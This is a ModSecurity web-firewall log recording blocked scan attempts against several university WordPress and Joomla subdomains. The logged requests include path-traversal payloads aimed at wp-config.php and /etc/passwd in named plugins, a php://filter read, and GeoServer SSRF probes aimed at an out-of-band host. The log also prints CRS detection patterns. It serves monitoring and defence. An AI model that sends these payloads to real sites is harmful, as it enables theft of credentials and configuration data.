[Tue Aug 29 11:47:57.402717 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkNPqYAAAAI"]
[Tue Aug 29 11:47:57.408681 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkaC-wAAAAJ"]
[Tue Aug 29 11:47:57.425286 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAkdu5cAAAAO"]
[Tue Aug 29 11:47:57.459845 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fcCo-f0AAAhui-cAAAAr"]
[Tue Aug 29 11:47:58.404982 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAi2yMIAAAAN"]
[Tue Aug 29 11:47:58.405272 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjCbNEAAAAB"]
[Tue Aug 29 11:47:58.431676 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAkGCVQAAAAE"]
[Tue Aug 29 11:47:58.434809 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjy52UAAAAG"]
[Tue Aug 29 11:47:58.434845 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14fsCo-f0AAAjbw4kAAAAW"]
[Tue Aug 29 11:47:58.463801 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjy52YAAAAG"]
[Tue Aug 29 11:47:58.480352 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjqDGQAAAAH"]
[Tue Aug 29 11:47:58.483810 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAjy52cAAAAG"]
[Tue Aug 29 11:47:58.484677 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkNPq0AAAAI"]
[Tue Aug 29 11:47:58.485382 2023] [:error] [pid 2330] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14fsCo-f0AAAkaDAMAAAAJ"]
[Tue Aug 29 11:47:58.492846 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:guideState. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:guideState: {\\x22guideState\\x22:{\\x22guideDom\\x22:{},\\x22guideContext\\x22:{\\x22xsdRef\\x22:\\x22\\x22,\\x22guidePrefillXml\\x22:\\x22<afData>\\x5cu0041\\x5cu0042\\x5cu0043</afData>\\x22}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/content/2UdyWQdY5J32lAmsUBxLSfyO3WC.af.internalsubmit.json"] [unique_id "ZO14fsCo-f0AAAi2yMUAAAAN"]
[Tue Aug 29 11:47:58.514932 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:adaptive-images-settings[source_file]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:adaptive-images-settings[source_file]: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/adaptive-images/adaptive-images-script.php"] [unique_id "ZO14fsCo-f0AAAi2yMYAAAAN"]
[Tue Aug 29 11:47:59.355445 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkGCVcAAAAE"]
[Tue Aug 29 11:47:59.365777 2023] [:error] [pid 2304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkAL@MAAAAU"]
[Tue Aug 29 11:47:59.376047 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkGCVgAAAAE"]
[Tue Aug 29 11:47:59.379990 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dw_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../.././../../../ found within ARGS:dw_file: ../../.././../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php/component/jemessenger/box_details"] [unique_id "ZO14f8Co-f0AAAjbw44AAAAW"]
[Tue Aug 29 11:47:59.718852 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../ found within ARGS:query: php://filter/resource=../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZO14f8Co-f0AAAkNPrEAAAAI"]
[Tue Aug 29 11:47:59.779067 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14f8Co-f0AAAkNPrIAAAAI"]
[Tue Aug 29 11:48:00.465648 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjbw5AAAAAW"]
[Tue Aug 29 11:48:00.646865 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:filepath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZO14gMCo-f0AAAjbw5MAAAAW"]
[Tue Aug 29 11:48:00.905198 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy530AAAAG"]
[Tue Aug 29 11:48:00.925443 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy534AAAAG"]
[Tue Aug 29 11:48:00.947870 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy538AAAAG"]
[Tue Aug 29 11:48:00.993696 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gMCo-f0AAAjy54EAAAAG"]
[Tue Aug 29 11:48:01.015389 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjy54IAAAAG"]
[Tue Aug 29 11:48:01.087685 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrYAAAAI"]
[Tue Aug 29 11:48:01.353439 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrgAAAAI"]
[Tue Aug 29 11:48:01.353645 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjbw5YAAAAW"]
[Tue Aug 29 11:48:01.375857 2023] [:error] [pid 2342] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkmTg8AAAAF"]
[Tue Aug 29 11:48:01.376269 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkNPrkAAAAI"]
[Tue Aug 29 11:48:01.376267 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAjbw5cAAAAW"]
[Tue Aug 29 11:48:01.377097 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAj11-0AAAAa"]
[Tue Aug 29 11:48:01.383460 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAklev0AAAAD"]
[Tue Aug 29 11:48:01.398542 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAj11-4AAAAa"]
[Tue Aug 29 11:48:01.426543 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAklev4AAAAD"]
[Tue Aug 29 11:48:01.554936 2023] [:error] [pid 2333] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:url: http://oast.pro/geoserver/../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "oast.pro"] [uri "/geoserver/TestWfsPost"] [unique_id "ZO14gcCo-f0AAAkdu6cAAAAO"]
